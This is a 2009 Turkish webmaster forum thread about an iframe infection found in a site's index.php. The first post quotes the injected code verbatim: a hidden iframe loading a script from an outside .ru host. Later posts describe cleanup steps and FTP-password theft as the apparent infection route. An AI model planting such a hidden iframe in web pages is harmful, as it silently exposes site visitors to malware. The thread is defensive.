• 05-08-2009, 22:04:47
    #1
    şöyle bir iframe virüsü buldum index sayfasında

    <iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe>

    bu kodu temizlemek için explorerden ftp ye girdim.
    sırasıyla tüm dosyalara baktım bulaşmış mı diye sadece index.php de buldum ve silip tekrar kaydettim
    tüm ftp şifrelerimi değiştirdim pc yi virüslere karşı tarattım.
    Daha sonra google web araçlarından tekrar değerlendirme istedim. saat 14:00 gibi ve saat 21:55 de zararlı site konumunda çıktı.


    pek anlatamadım ama elimden yazmaya çalıştım bu durumda çok arkadaşımız var.

    not: site sürekli güncel bir site ve hergün google de güncelleniyordu.

    Oyunntr.com | Bedava Oyun Merkezi | Güncel Yeni Oyunlar
  • 05-08-2009, 22:24:44
    #2
    Aynı iframe virüsü geçenler de benim siteme de girmişti 2 gün içinde ancak temizledim. Allah'a şükür google amca "bu site bilgisayarınıza zarar verebilir" uyarısı vermedi
  • 05-08-2009, 22:37:07
    #3
    bu virüs bilgisayarınızda kullandığınız ftp yazılımının şifreleri kaydetmesi ile şifreyi çalıyor.ftp programınızda asla şifre (hatta hiçbir bilgiyi) kaydetmeyin.
  • 05-08-2009, 22:44:08
    #4
    Temizlediğim halde, FTP şifresini değiştirdiğim , PC'ye forma attığım halde bile 1 hafta sonra tekrar bulaşıyordu. Bir süre sonra bulaşmamaya başladı.
  • 05-08-2009, 23:20:07
    #5
    Genellikle index.php dosyalarına giriyor....
    Bide Dosya İsmi İçininde İndex kelimesi Geçen Dosyalarda Verir O Uyarıyı...
  • 05-08-2009, 23:37:19
    #6
    Benim bir sitede bu virüs 6 ay durdu ve 6 ay boyunca site fişlenmedi